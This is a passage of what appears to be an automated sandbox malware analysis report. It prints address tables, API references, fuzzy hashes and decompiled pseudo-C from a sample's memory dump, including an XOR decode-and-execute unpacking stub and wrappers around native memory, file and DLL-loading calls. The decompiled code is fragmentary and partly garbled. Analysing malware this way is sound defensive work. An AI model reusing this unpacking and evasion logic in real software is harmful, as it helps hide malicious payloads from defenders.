                                              0x004012e5
                                              0x004012ea
                                              0x004012eb
                                              0x004012ef
                                              0x004012f4
                                              0x004012fc
                                              0x00401301
                                              0x00401308
                                              0x0040130f
                                              0x00401314
                                              0x00401319
                                              0x0040131e
                                              0x00401321
                                              0x00401326
                                              0x0040132b
                                              0x00401335
                                              0x0040133f
                                              0x00401346
                                              0x0040134b
                                              0x00401350
                                              0x00401357
                                              0x0040135e
                                              0x00401368
                                              0x0040136f
                                              0x00401376
                                              0x0040137e
                                              0x00401383
                                              0x0040138a
                                              0x00401399
                                              0x004013a0
                                              0x004013a8
                                              0x004013b2
                                              0x004013b8
                                              0x004013bc
                                              0x004013c2
                                              0x004013c6
                                              0x004013cc
                                              0x004013d2
                                              0x004013d9
                                              0x004013dc
                                              0x004013e3
                                              0x004013ea
                                              0x004013f0
                                              0x004013f8
                                              0x00401402
                                              0x0040140a
                                              0x00401412
                                              0x0040141e
                                              0x00401429
                                              0x00401431
                                              0x00401436
                                              0x0040143b
                                              0x00401442
                                              0x00401447
                                              0x0040144a
                                              0x0040144f
                                              0x00401459
                                              0x0040145c
                                              0x00401466
                                              0x0040146b
                                              0x0040146f
                                              0x00401478
                                              0x0040147f
                                              0x00401486
                                              0x0040148b
                                              0x00401493
                                              0x0040149a
                                              0x004014a1
                                              0x004014a9
                                              0x004014af
                                              0x004014b5
                                              0x004014ba
                                              0x004014cf
                                              0x004014d9
                                              0x004014e0
                                              0x004014e5
                                              0x004014f0
                                              0x004014f3
                                              0x004014f9
                                              0x004014ff
                                              0x00000000
                                              0x00000000
                                              0x00401512
                                              0x00401519
                                              0x00000000
                                              0x0040151b
                                              0x0040151b
                                              0x0040151b
                                              0x0040151e
                                              0x0040152e
                                              0x00401535
                                              0x0040153c
                                              0x0040153e
                                              0x00401545
                                              0x0040154c
                                              0x00401553
                                              0x0040155a
                                              0x0040156b
                                              0x00401573
                                              0x00401579
                                              0x00401585
                                              0x00401585
                                              0x00401586
                                              0x00401589
                                              0x00000000

                                              APIs
                                              • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_febcldoukq.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID: C+hc
                                              • API String ID: 2706961497-3848425603
                                              • Opcode ID: 26f1120809d1feb0c163b61a0abebeb7254256f3a3cdf450942e01968005958d
                                              • Instruction ID: fcc810aa046927e03f53f1a9924a5796219225d0523ae0329bd7461604c32dc9
                                              • Opcode Fuzzy Hash: 26f1120809d1feb0c163b61a0abebeb7254256f3a3cdf450942e01968005958d
                                              • Instruction Fuzzy Hash: 5E8135B1C2075CAADF10CFE4CC41AEEBBB4BF99300F60421AE415BB291EB7516858B95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041E081 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35memorynativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 82 41e081-41e0c4 call 41eb17 NtAllocateVirtualMemory
                                              C-Code - Quality: 53%
                                              			E0041E081(void* __ecx, intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, char _a32) {
				long _t14;

				asm("outsb");
				asm("cld");
				asm("sbb edx, [ebp-0x75]");
				_t10 = _a8;
				E0041EB17( *((intOrPtr*)(_a8 + 0x14)), _t10, _t10 + 0xc84,  *((intOrPtr*)(_a8 + 0x14)), 0, 0x30);
				_t4 =  &_a32; // 0x404448
				_t14 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28,  *_t4); // executed
				return _t14;
			}




                                              0x0041e081
                                              0x0041e083
                                              0x0041e086
                                              0x0041e08a
                                              0x0041e09e
                                              0x0041e0a3
                                              0x0041e0c0
                                              0x0041e0c4

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E0C0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_febcldoukq.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID: HD@
                                              • API String ID: 2167126740-1661062907
                                              • Opcode ID: 387b29607ff46aa32d144c1736e2695b69092b8efe425d994f9ebe1e44ae0b07
                                              • Instruction ID: 13dc513da67dbfdf35d7b2783610b2457132d1ee3ed132f4f05716f0de5edc6f
                                              • Opcode Fuzzy Hash: 387b29607ff46aa32d144c1736e2695b69092b8efe425d994f9ebe1e44ae0b07
                                              • Instruction Fuzzy Hash: 8BF0FEB6210118AFDB18DFA9DC81EDB77A9EF88354F118209FE0997241D635F911CBB4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041E087 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memorynativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 85 41e087-41e09d 86 41e0a3-41e0c4 NtAllocateVirtualMemory 85->86 87 41e09e call 41eb17 85->87 87->86
                                              C-Code - Quality: 100%
                                              			E0041E087(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, char _a28) {
				long _t14;

				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xc84,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t4 =  &_a28; // 0x404448
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24,  *_t4); // executed
				return _t14;
			}




                                              0x0041e09e
                                              0x0041e0a3
                                              0x0041e0c0
                                              0x0041e0c4

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E0C0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_febcldoukq.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID: HD@
                                              • API String ID: 2167126740-1661062907
                                              • Opcode ID: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                              • Instruction ID: f463faf2946c0d4d74eccb42d7aa3306e3984d4a8e1b0def0a1c2f8da30aeccc
                                              • Opcode Fuzzy Hash: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                              • Instruction Fuzzy Hash: B0F015B6200218ABCB18DF89DC81EEB77ADAF88754F018109BE0997241C630F810CBB4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040C317 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 329 40c317-40c333 330 40c33b-40c340 329->330 331 40c336 call 420837 329->331 332 40c342-40c345 330->332 333 40c346-40c354 call 420c57 330->333 331->330 336 40c364-40c375 call 41f0b7 333->336 337 40c356-40c361 call 420ed7 333->337 342 40c377-40c38b LdrLoadDll 336->342 343 40c38e-40c391 336->343 337->336 342->343
                                              C-Code - Quality: 100%
                                              			E0040C317(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00420837( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E00420C57(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00420ED7( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F0B7(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                              0x0040c333
                                              0x0040c336
                                              0x0040c33b
                                              0x0040c340
                                              0x0040c34a
                                              0x0040c34f
                                              0x0040c352
                                              0x0040c354
                                              0x0040c35c
                                              0x0040c361
                                              0x0040c361
                                              0x0040c368
                                              0x0040c370
                                              0x0040c373
                                              0x0040c375
                                              0x0040c389
                                              0x00000000
                                              0x0040c38b
                                              0x0040c391
                                              0x0040c345
                                              0x0040c345
                                              0x0040c345

                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040C389
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_febcldoukq.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 064fc8b9e47045ed70fd012ce6989d3b14e09ff0de191e258dc97656c0333484
                                              • Instruction ID: 3ed70020f7d6b18ccec5613b1dbda4d69e0aa25de14af4a900ab92096e63d096
                                              • Opcode Fuzzy Hash: 064fc8b9e47045ed70fd012ce6989d3b14e09ff0de191e258dc97656c0333484
                                              • Instruction Fuzzy Hash: 5D0100B5E00209A7DB10DBA5DC82F9EB7B89F54304F0082A5AD08A7281F635EB588B95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004014E9 Relevance: 1.5, APIs: 1, Instructions: 48nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 315 4014e9 316 4014f0-4014ff 315->316 317 401501-401504 316->317 318 401512-401519 316->318 317->318 319 401506-40150a 317->319 318->316 320 40151b 318->320 319->318 322 40150c-401510 319->322 321 40151e-401573 NtProtectVirtualMemory call 4016b0 320->321 327 401579 call 422f47 321->327 328 401579 call 422f39 321->328 322->318 324 401586-40158c 322->324 324->321 326 40157b-401585 327->326 328->326
                                              C-Code - Quality: 58%
                                              			E004014E9(void* __eax, void* __ebx, void* __ecx) {
				void* _t25;
				void* _t35;
				void* _t37;
				signed int _t39;
				void* _t41;
				void* _t43;

				_t37 = __ecx;
				_t35 = __ebx;
				_t25 = __eax;
				while(1) {
					_t39 =  *(_t37 + _t25) ^ 0x11a7a880;
					 *(_t43 - 0x74) = _t39;
					if(_t39 == 0x3e && _t39 == 0x97 &&  *((char*)(_t43 - 0x72)) == 0xbd &&  *((char*)(_t43 - 0x71)) == 0xba) {
						break;
					}
					_t37 = _t37 + 1;
					if(_t37 < 0x4000) {
						continue;
					} else {
						_t41 =  *(_t43 - 0x44);
					}
					L7:
					 *(_t43 - 0x78) = 0;
					 *(_t43 - 0x7c) = 0x2ca00;
					NtProtectVirtualMemory(0xffffffff, _t43 - 0x44, _t43 - 0x7c, 0x40, _t43 - 0x78); // executed
					 *(_t43 - 0x40) =  *(_t43 - 0x40) ^ 0x11a7a880;
					 *(_t43 - 0x3c) =  *(_t43 - 0x3c) ^ 0x11a7a880;
					 *(_t43 - 0x38) =  *(_t43 - 0x38) ^ 0x11a7a880;
					 *(_t43 - 0x34) =  *(_t43 - 0x34) ^ 0x11a7a880;
					 *(_t43 - 0x30) =  *(_t43 - 0x30) ^ 0x11a7a880;
					E004016B0(_t35, _t41, 0x2ca00, _t43 - 0x40);
					_t22 = _t41 + 0x21810; // 0x21810, executed
					 *_t22(); // executed
					return 0;
				}
				_t41 = _t37 + _t25;
				 *(_t43 - 0x44) = _t41;
				goto L7;
			}









                                              0x004014e9
                                              0x004014e9
                                              0x004014e9
                                              0x004014f0
                                              0x004014f3
                                              0x004014f9
                                              0x004014ff
                                              0x00000000
                                              0x00000000
                                              0x00401512
                                              0x00401519
                                              0x00000000
                                              0x0040151b
                                              0x0040151b
                                              0x0040151b
                                              0x0040151e
                                              0x0040152e
                                              0x00401535
                                              0x0040153c
                                              0x0040153e
                                              0x00401545
                                              0x0040154c
                                              0x00401553
                                              0x0040155a
                                              0x0040156b
                                              0x00401573
                                              0x00401579
                                              0x00401585
                                              0x00401585
                                              0x00401586
                                              0x00401589
                                              0x00000000

                                              APIs
                                              • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_febcldoukq.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID:
                                              • API String ID: 2706961497-0
                                              • Opcode ID: 9687d2587e9857bb39df220e0e3cf835e89e689ab03871ec4c15cd7860a66439
                                              • Instruction ID: 2b90622f39393b0058c2aa15a19c005d267b5dc71508bad4b704c993792a708c
                                              • Opcode Fuzzy Hash: 9687d2587e9857bb39df220e0e3cf835e89e689ab03871ec4c15cd7860a66439
                                              • Instruction Fuzzy Hash: C7115471D146486EDF29CAF4DC41ADFBBB4EF40324F64022ED922A71E1D73619468B85
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041DEA7 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 344 41dea7-41def8 call 41eb17 NtCreateFile
                                              C-Code - Quality: 100%
                                              			E0041DEA7(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xc64; // 0xc64
				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                              0x0041deb6
                                              0x0041debe
                                              0x0041def4
                                              0x0041def8

                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000005,00000000,004187E3,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,004187E3,00000000,00000005,00000060,00000000,00000000), ref: 0041DEF4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_febcldoukq.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                              • Instruction ID: caa4313a033a612cc3db5c025c9ef0f97435adee46135c765efab3485d53b6e5
                                              • Opcode Fuzzy Hash: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                              • Instruction Fuzzy Hash: 64F0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018208BA0997241D630F851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041DF52 Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 354 41df52-41dfa0 call 41eb17 NtReadFile
                                              C-Code - Quality: 19%
                                              			E0041DF52(void* __eax, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t21;
				intOrPtr* _t32;
				void* _t34;

				asm("sbb eax, 0x55b2e1f3");
				_t16 = _a4;
				_t4 = _t16 + 0xc6c; // 0xe72
				_t32 = _t4;
				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _t16, _t32,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t21 =  *((intOrPtr*)( *_t32))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, __eax, _t34); // executed
				return _t21;
			}






                                              0x0041df53
                                              0x0041df5a
                                              0x0041df66
                                              0x0041df66
                                              0x0041df6e
                                              0x0041df9c
                                              0x0041dfa0

                                              APIs
                                              • NtReadFile.NTDLL(004189A7,00413C7B,FFFFFFFF,00418491,00000206,?,004189A7,00000206,00418491,FFFFFFFF,00413C7B,004189A7,00000206,00000000), ref: 0041DF9C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_febcldoukq.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 06f743e81d4c6f344aa10923ce3285c99be648eee4bc05ec812d257d534e59f4
                                              • Instruction ID: 078f94cc8e3ca05c9ab6c20fa3f3a32812e3feebc94ed0dc4228923cd4752e54
                                              • Opcode Fuzzy Hash: 06f743e81d4c6f344aa10923ce3285c99be648eee4bc05ec812d257d534e59f4
                                              • Instruction Fuzzy Hash: FBF0F4B2200118ABCB14DF89DC84EEB77A9AF8C754F118208BE4D9B281D630EC11CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041DF57 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 357 41df57-41df6d 358 41df73-41dfa0 NtReadFile 357->358 359 41df6e call 41eb17 357->359 359->358
                                              C-Code - Quality: 37%
                                              			E0041DF57(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t3 = _a4 + 0xc6c; // 0xe72
				_t27 = _t3;
				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                              0x0041df66
                                              0x0041df66
                                              0x0041df6e
                                              0x0041df9c
                                              0x0041dfa0

                                              APIs
                                              • NtReadFile.NTDLL(004189A7,00413C7B,FFFFFFFF,00418491,00000206,?,004189A7,00000206,00418491,FFFFFFFF,00413C7B,004189A7,00000206,00000000), ref: 0041DF9C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_febcldoukq.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                              • Instruction ID: 655cb4e4c396fce941b8546bf9d16efbca437de042abb1fe47c2fd903f90b2bb
                                              • Opcode Fuzzy Hash: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                              • Instruction Fuzzy Hash: 76F0AFB6200208ABCB14DF89DC85EEB77ADAF8C754F118249BE0DA7241D630E811CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041DFD2 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0041DFD2(intOrPtr __ebx, void* __edx, void* __edi, intOrPtr _a4, void* _a8) {
				long _t11;

				 *((intOrPtr*)(__edx + __edi - 0xffffffffec8b5554)) = __ebx;
				_t8 = _a4;
				_t6 = _t8 + 0xc74; // 0xc79
				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _t8, _t6,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t11 = NtClose(_a8); // executed
				return _t11;
			}




                                              0x0041dfd3
                                              0x0041dfda
                                              0x0041dfe6
                                              0x0041dfee
                                              0x0041dffc
                                              0x0041e000

                                              APIs
                                              • NtClose.NTDLL(00418985,00000206,?,00418985,00000005,FFFFFFFF), ref: 0041DFFC
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_febcldoukq.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: d19b84792e9f1990ceab20171babb533aaec6d64bca2ed1901bf09d319f22f62
                                              • Instruction ID: 1825da56593b3af8d6400fd194690cf66959247995f7361e4e5bd31633b70e00
                                              • Opcode Fuzzy Hash: d19b84792e9f1990ceab20171babb533aaec6d64bca2ed1901bf09d319f22f62
                                              • Instruction Fuzzy Hash: DCE0C232204220AFD710EBA4DC89FD73B58EF88360F004599B94D5F642C630E900C7E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041DFD7 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0041DFD7(intOrPtr _a4, void* _a8) {
				long _t8;

				_t3 = _a4 + 0xc74; // 0xc79
				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _t5, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                              0x0041dfe6
                                              0x0041dfee
                                              0x0041dffc
                                              0x0041e000

                                              APIs
                                              • NtClose.NTDLL(00418985,00000206,?,00418985,00000005,FFFFFFFF), ref: 0041DFFC
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_febcldoukq.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                              • Instruction ID: d7652ac376bfee5cbf167f0e09bc99e97af7e0678d6cdc255ef65e079968a69b
                                              • Opcode Fuzzy Hash: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                              • Instruction Fuzzy Hash: 78D01776204214ABD614EBA9DC89ED77BACDF48664F014155BA0D5B242D631FA008BE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00408D87 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 294 408d87-408dd1 call 41faf7 call 4205e7 call 40c317 call 418a87 303 408dd3-408de5 PostThreadMessageW 294->303 304 408e05-408e09 294->304 305 408e04 303->305 306 408de7-408e01 call 40ba77 303->306 305->304 306->305
                                              C-Code - Quality: 82%
                                              			E00408D87(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041FAF7( &_v67, 0, 0x3f);
				E004205E7( &_v68, 3);
				_t12 = E0040C317(_t30, _a4 + 0x20,  &_v68); // executed
				_t13 = E00418A87(_a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040BA77(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                              0x00408d87
                                              0x00408d96
                                              0x00408d9a
                                              0x00408da5
                                              0x00408db5
                                              0x00408dc5
                                              0x00408dca
                                              0x00408dd1
                                              0x00408dd4
                                              0x00408de1
                                              0x00408de3
                                              0x00408de5
                                              0x00408e02
                                              0x00408e02
                                              0x00000000
                                              0x00408e04
                                              0x00408e09

                                              APIs
                                              • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00408DE1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_febcldoukq.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: 6a5c76f33e69d631c5cd5faa055fa231827f6670659c0f58f240d0f59781fcbe
                                              • Instruction ID: 3980c94b8ac149ca01037ed3d68c8fe9f93dea2d4a324d6a02d52aa73a4abf13
                                              • Opcode Fuzzy Hash: 6a5c76f33e69d631c5cd5faa055fa231827f6670659c0f58f240d0f59781fcbe
                                              • Instruction Fuzzy Hash: 1C018831A8022876E720A6959C43FFE765C5B41B59F04412EFF04FA1C1E6A8690686E9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041E1ED Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 309 41e1ed-41e1f6 310 41e1f8-41e21f call 41eb17 ExitProcess 309->310 311 41e24d-41e27f 309->311
                                              C-Code - Quality: 100%
                                              			E0041E1ED(void* __ebx, void* __ecx, void* __edx, void* __esi, void* _a4, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40) {
				void* _v0;
				void* _v1;
				void* _t25;

				_t25 = __ebx + 1;
				if (_t25 != 0) goto L3;
			}






                                              0x0041e1f3
                                              0x0041e1f6

                                              APIs
                                              • ExitProcess.KERNEL32(?,00000000,000000E6,?,?,00000001), ref: 0041E21F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_febcldoukq.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: fe07c7a1fe7cc184691f729d252de3d8f94143cdc67c282ef1b5fd2a164ce06d
                                              • Instruction ID: 3a23005c1a450b0ce9384711c7274ff542fa1110ee067af937f3c804ecebbb44
                                              • Opcode Fuzzy Hash: fe07c7a1fe7cc184691f729d252de3d8f94143cdc67c282ef1b5fd2a164ce06d
                                              • Instruction Fuzzy Hash: 470144B6200108ABCB14DF99DC84DEB77ACEF8C654F058259FA5D9B245C630E801CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041E388 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 347 41e388-41e38f 348 41e391-41e3c1 call 41ebe7 347->348 349 41e339-41e34b LookupPrivilegeValueW 347->349
                                              C-Code - Quality: 34%
                                              			E0041E388(void* __eax, struct _LUID* __edx, void* __edi, intOrPtr _a5, intOrPtr _a9, WCHAR* _a12, WCHAR* _a16) {
				intOrPtr* __esi;
				int _t10;

				asm("sbb [0x6c5f1de9], ecx");
				if(__edi - 1 >= 0) {
					_t10 = LookupPrivilegeValueW(_a12, _a16, __edx); // executed
					return _t10;
				} else {
					__edx = __edx - 1;
					__esp = __esp + 1;
					asm("pushad");
					asm("fisub word [ecx]");
					_t3 = __eax;
					__eax = __ebp;
					__ebp = _t3;
					__ebp = __esp;
					__eax = _a5;
					__esi = _a5 + 0x1bf4;
					__eax = E0041EBE7(__eax, __esi,  *((intOrPtr*)(__eax + 0x23a4)), 2);
					__edx = _a9;
					__eax =  *__esi;
					__eax =  *((intOrPtr*)( *__esi))(_a9, __ebp);
					_pop(__esi);
					__ebp = __esi;
					return  *__esi;
				}
			}





                                              0x0041e389
                                              0x0041e38f
                                              0x0041e347
                                              0x0041e34b
                                              0x0041e391
                                              0x0041e391
                                              0x0041e392
                                              0x0041e393
                                              0x0041e394
                                              0x0041e396
                                              0x0041e396
                                              0x0041e396
                                              0x0041e398
                                              0x0041e39a
                                              0x0041e3a7
                                              0x0041e3af
                                              0x0041e3b4
                                              0x0041e3b7
                                              0x0041e3bd
                                              0x0041e3bf
                                              0x0041e3c0
                                              0x0041e3c1
                                              0x0041e3c1

                                              APIs
